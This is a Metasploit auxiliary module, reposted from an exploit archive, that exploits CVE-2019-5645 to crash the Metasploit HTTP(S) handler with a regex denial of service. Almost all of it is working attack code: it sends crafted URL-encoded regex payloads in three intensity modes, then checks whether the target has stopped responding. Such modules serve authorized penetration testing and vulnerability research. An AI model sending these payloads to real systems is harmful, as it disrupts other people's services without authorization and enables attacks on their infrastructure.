## https://sploitus.com/exploit?id=PACKETSTORM:180527
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit HTTP(S) handler DoS',
'Description' => %q{
This module exploits the Metasploit HTTP(S) handler by sending
a specially crafted HTTP request that gets added as a resource handler.
Resources (which come from the external connections) are evaluated as RegEx
in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.
Tested against Metasploit 5.0.20.
},
'Author' => [
'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2019-5645']
],
'DisclosureDate' => '2019-09-04'
))
register_options(
[
OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
])
end
def test_service_unresponsive
begin
print_status('Testing for service unresponsiveness.')
res = send_request_cgi({
'uri' => '/' + Rex::Text.rand_text_alpha(8),
'method' => 'GET'
})
if res.nil?
print_good('SUCCESS, Service not responding.')
else
print_error('Service responded with a valid HTTP Response; Attack failed.')
end
rescue ::Rex::ConnectionRefused
print_error('An unknown error occurred.')
rescue ::Timeout::Error
print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
end
end
def dos
case datastore['DOSTYPE']
when "HARD"
resone = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/%2f%26%28%21%7c%23%2b%29%2b%40%32%30")
)
begin
restwo = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21")
)
rescue ::Errno::EPIPE, ::Timeout::Error
# Same exceptions the HttpClient mixin catches
end
test_service_unresponsive
when "SOFT"
resone = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/%5b20")
)
test_service_unresponsive
when "GENTLE"
resone = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/%2e%2a%7c%32%30%7c%5c")
)
sleep(1)
restwo = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/whatever")
)
resthree = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri("/whatever2")
)
if resthree.body.length == 0
print_good('SUCCESS, Service not responding.')
else
print_error('Service responded with a valid HTTP Response; Attack failed.')
end
else
fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'
end
print_status("DOS request sent")
end
def is_alive?
begin
connect
rescue Rex::ConnectionRefused
return false
ensure
disconnect
end
true
end
def run
print_status("#{rhost}:#{rport} - Sending DoS packet...")
dos
end
end